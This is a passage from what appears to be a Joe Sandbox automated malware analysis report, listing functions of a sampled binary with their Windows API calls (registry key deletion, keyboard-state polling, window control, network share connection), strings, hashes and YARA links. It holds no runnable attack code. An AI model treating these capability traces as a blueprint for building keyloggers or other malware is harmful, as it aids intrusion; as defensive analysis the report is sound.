                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                                                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                          • API String ID: 1939486746-1459072770
                                                                                                                                                                                                                                          • Opcode ID: c278f375b314134924d45853d1d84f784a477af8a91fa9a6b521dbb71eeffa17
                                                                                                                                                                                                                                          • Instruction ID: ed0425d629e53b20847951e440126ac077c751816be0dd7fd92117c768f1b6ba
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c278f375b314134924d45853d1d84f784a477af8a91fa9a6b521dbb71eeffa17
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48411432A403157ADB14AB75EC43EFF776CEF52750F10006AFA00A6183EB75AA0197B5
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0015CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0015CC64
                                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0015CC8D
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0015CD48
                                                                                                                                                                                                                                            • Part of subcall function 0015CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0015CCAA
                                                                                                                                                                                                                                            • Part of subcall function 0015CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0015CCBD
                                                                                                                                                                                                                                            • Part of subcall function 0015CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0015CCCF
                                                                                                                                                                                                                                            • Part of subcall function 0015CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0015CD05
                                                                                                                                                                                                                                            • Part of subcall function 0015CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0015CD28
                                                                                                                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 0015CCF3
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                          • API String ID: 2734957052-4033151799
                                                                                                                                                                                                                                          • Opcode ID: 97ed669d7642c7fa578d1c765d441d17c89b22ecfee26e260af8a551ad0dea9d
                                                                                                                                                                                                                                          • Instruction ID: a7b37d24d80c0d6ce4ce0c7e01823b1c85d4ff30b13029dabf553d895cbcdcca
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97ed669d7642c7fa578d1c765d441d17c89b22ecfee26e260af8a551ad0dea9d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3315975901229FFDB219F949C88EFFBB7CEF46741F000165F915E6240DBB09A899AE0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00143D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00143D40
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00143D6D
                                                                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00143D9D
                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00143DBE
                                                                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(?), ref: 00143DCE
                                                                                                                                                                                                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00143E55
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00143E60
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00143E6B
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                                                                                          • String ID: :$\$\??\%s
                                                                                                                                                                                                                                          • API String ID: 1149970189-3457252023
                                                                                                                                                                                                                                          • Opcode ID: e7e3a078e296cb0800b2eb965db349411c6bb53c82ebb326aa5e3357e2528258
                                                                                                                                                                                                                                          • Instruction ID: b44e324f107b4993a2a04841b532b3165cd038de17f4d1e7cdd35f2982a4db27
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7e3a078e296cb0800b2eb965db349411c6bb53c82ebb326aa5e3357e2528258
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A531B272900219ABDB209BA0DC49FEF37BDEF89700F5040B6FA19D6161E7B497858B64
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • timeGetTime.WINMM ref: 0013E6B4
                                                                                                                                                                                                                                            • Part of subcall function 000EE551: timeGetTime.WINMM(?,?,0013E6D4), ref: 000EE555
                                                                                                                                                                                                                                          • Sleep.KERNEL32(0000000A), ref: 0013E6E1
                                                                                                                                                                                                                                          • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0013E705
                                                                                                                                                                                                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0013E727
                                                                                                                                                                                                                                          • SetActiveWindow.USER32 ref: 0013E746
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0013E754
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 0013E773
                                                                                                                                                                                                                                          • Sleep.KERNEL32(000000FA), ref: 0013E77E
                                                                                                                                                                                                                                          • IsWindow.USER32 ref: 0013E78A
                                                                                                                                                                                                                                          • EndDialog.USER32(00000000), ref: 0013E79B
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                                                          • String ID: BUTTON
                                                                                                                                                                                                                                          • API String ID: 1194449130-3405671355
                                                                                                                                                                                                                                          • Opcode ID: 6efb6116c9d9caf01c3a4c4fad97e0ebb00d81e83fbdb4cdc4189883b9ad437b
                                                                                                                                                                                                                                          • Instruction ID: a9f8c30c99517a251897f24dd7b0d9a43162d70b67d1ac37e7baba657d1c513e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6efb6116c9d9caf01c3a4c4fad97e0ebb00d81e83fbdb4cdc4189883b9ad437b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 042193B0240345AFFB105F64EC99A363BA9FB56359F100425F856C2EF1DBB1AC808BA4
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
                                                                                                                                                                                                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0013EA5D
                                                                                                                                                                                                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0013EA73
                                                                                                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0013EA84
                                                                                                                                                                                                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0013EA96
                                                                                                                                                                                                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0013EAA7
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: SendString$_wcslen
                                                                                                                                                                                                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                          • API String ID: 2420728520-1007645807
                                                                                                                                                                                                                                          • Opcode ID: 33535f0da15c45ed2a4ffe4935ce60ce759ad82d2b063dd1c5e59f429f327718
                                                                                                                                                                                                                                          • Instruction ID: 05f88c029dd99bb603971fa34fa24df843ebea61aed2da2723702fea49ec1991
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33535f0da15c45ed2a4ffe4935ce60ce759ad82d2b063dd1c5e59f429f327718
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF1112216503597DEB10A7A1DD4AEFB7ABCEBD1B44F40042A7411A21D1DB705945C5B1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00139F91 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 0013A012
                                                                                                                                                                                                                                          • SetKeyboardState.USER32(?), ref: 0013A07D
                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 0013A09D
                                                                                                                                                                                                                                          • GetKeyState.USER32(000000A0), ref: 0013A0B4
                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 0013A0E3
                                                                                                                                                                                                                                          • GetKeyState.USER32(000000A1), ref: 0013A0F4
                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 0013A120
                                                                                                                                                                                                                                          • GetKeyState.USER32(00000011), ref: 0013A12E
                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 0013A157
                                                                                                                                                                                                                                          • GetKeyState.USER32(00000012), ref: 0013A165
                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 0013A18E
                                                                                                                                                                                                                                          • GetKeyState.USER32(0000005B), ref: 0013A19C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 541375521-0
                                                                                                                                                                                                                                          • Opcode ID: 3c59aa2f9fbcc1b6c1e1f311b12e66b478cc1d9ba052d23a87a453cb634b2851
                                                                                                                                                                                                                                          • Instruction ID: 657109ec3e3e1502d6433e8eceb3f2a00fd184177c0cbf3a1f3ad5c40f74b522
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c59aa2f9fbcc1b6c1e1f311b12e66b478cc1d9ba052d23a87a453cb634b2851
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0651DA30A0478829FB35EB7088557EBBFF49F12380F48859DD5C2571C2DB94AA8CC7A2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00135CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00135CE2
                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00135CFB
                                                                                                                                                                                                                                          • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00135D59
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00135D69
                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00135D7B
                                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00135DCF
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00135DDD
                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00135DEF
                                                                                                                                                                                                                                          • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00135E31
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00135E44
                                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00135E5A
                                                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00135E67
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3096461208-0
                                                                                                                                                                                                                                          • Opcode ID: 7493719b4708fa4c9aa3741275f4e44a1f5997ccccfbef8f3bef3d7ee268273b
                                                                                                                                                                                                                                          • Instruction ID: efa0cbc1375e23da2afb1220c49298a351938efdd801a9c18ffd871cef6744a8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7493719b4708fa4c9aa3741275f4e44a1f5997ccccfbef8f3bef3d7ee268273b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 775121B0B00605AFDF18CFA8CD89AAEBBB6FB48711F108129F515E7690D7709E40CB60
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000E8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000E8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000E8BE8,?,00000000,?,?,?,?,000E8BBA,00000000,?), ref: 000E8FC5
                                                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 000E8C81
                                                                                                                                                                                                                                          • KillTimer.USER32(00000000,?,?,?,?,000E8BBA,00000000,?), ref: 000E8D1B
                                                                                                                                                                                                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 00126973
                                                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,000E8BBA,00000000,?), ref: 001269A1
                                                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,000E8BBA,00000000,?), ref: 001269B8
                                                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,000E8BBA,00000000), ref: 001269D4
                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 001269E6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 641708696-0
                                                                                                                                                                                                                                          • Opcode ID: 1f752d3e8a5effa828c05964dd6542381fc7fde0209b2ec868605ed910d5b69e
                                                                                                                                                                                                                                          • Instruction ID: 866f3ce6a780230f8264a535437136e4a7a27a4298b6304d242cef63392b57fe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f752d3e8a5effa828c05964dd6542381fc7fde0209b2ec868605ed910d5b69e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8616A31502750EFCB359F16DD48B2AB7F1FB42316F24851DE086AB9A0CB75A9D0DB90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000E9838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000E9944: GetWindowLongW.USER32(?,000000EB), ref: 000E9952
                                                                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 000E9862
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ColorLongWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 259745315-0
                                                                                                                                                                                                                                          • Opcode ID: 1bb6125916f118b98500de09ee555dd5e028d3584dc9a3bf77c6fe59c1c85d63
                                                                                                                                                                                                                                          • Instruction ID: 6b356c851bb4f04927a2c9ab5d2c9c9b1c11020950f1e5e989956836b9c961bc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1bb6125916f118b98500de09ee555dd5e028d3584dc9a3bf77c6fe59c1c85d63
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE41D131104690EFDB205F399C88BBA7BA5AB07331F144615F9E2972F2DB709C82DB61
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001396E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0011F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00139717
                                                                                                                                                                                                                                          • LoadStringW.USER32(00000000,?,0011F7F8,00000001), ref: 00139720
                                                                                                                                                                                                                                            • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0011F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00139742
                                                                                                                                                                                                                                          • LoadStringW.USER32(00000000,?,0011F7F8,00000001), ref: 00139745
                                                                                                                                                                                                                                          • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00139866
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                          • API String ID: 747408836-2268648507
                                                                                                                                                                                                                                          • Opcode ID: 024b1589698c255f3874c0014a08de4131b81343a0ac3fea94c9c45364ca0feb
                                                                                                                                                                                                                                          • Instruction ID: f0da0c513b93110a8a77f741d4c1cc062a26b9865a965dd599aa212abc177aea
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 024b1589698c255f3874c0014a08de4131b81343a0ac3fea94c9c45364ca0feb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65413A72900209AADF04EBE0DE86EEEB778AF55740F500066F60572192EB756F48CBB1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001306DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D6B57: _wcslen.LIBCMT ref: 000D6B6A
                                                                                                                                                                                                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 001307A2
